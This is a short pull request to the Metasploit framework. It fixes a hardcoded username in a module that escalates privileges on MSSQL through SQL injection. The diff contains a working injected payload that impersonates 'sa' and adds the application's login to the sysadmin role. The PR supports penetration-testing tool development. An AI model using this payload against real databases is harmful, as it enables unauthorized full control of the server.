### PR TITLE
Fixed hardcoded username in mssql_escalate_execute_as_sqli module

### DIFF
--- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb
+++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb
@@ -193,7 +193,7 @@ class Metasploit3 < Msf::Auxiliary
   def escalate_privs(imp_user,db_user)
 
     # Setup Query - Impersonate the first sysadmin user on the list
-    evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember 'MyUser1','sysadmin';Revert;--"
+    evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"
 
     # Execute Query
     mssql_query(evil_sql)

--- a/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb
+++ b/modules/auxiliary/admin/mssql/mssql_escalate_execute_as_sqli.rb
@@ -190,7 +190,7 @@ class Metasploit3 < Msf::Auxiliary
   end
 
   # Attempt to escalate privileges
-  def escalate_privs(imp_user,db_user)
+  def escalate_privs(db_user)
 
     # Setup Query - Impersonate the first sysadmin user on the list
     evil_sql = "1;EXECUTE AS LOGIN = 'sa';EXEC sp_addsrvrolemember '#{db_user}','sysadmin';Revert;--"


### PR DESCRIPTION
The mssql_escalate_execute_as_sqli.rb module currently attempts to add the hardcoded SQL Server login 'MyUser1' to the sysadmin role.  I fixed it so that the current SQL Server login being used by the web application is added to the sysadmin role as intended.  Sorry I didn't catch this on the original pr.  Below is an example screen shot of the module running after applying the fix.

![screen shot 03-15-15 at 08 26 pm](https://cloud.githubusercontent.com/assets/1179731/6659349/c2482450-cb51-11e4-80de-7d55559a691c.PNG)
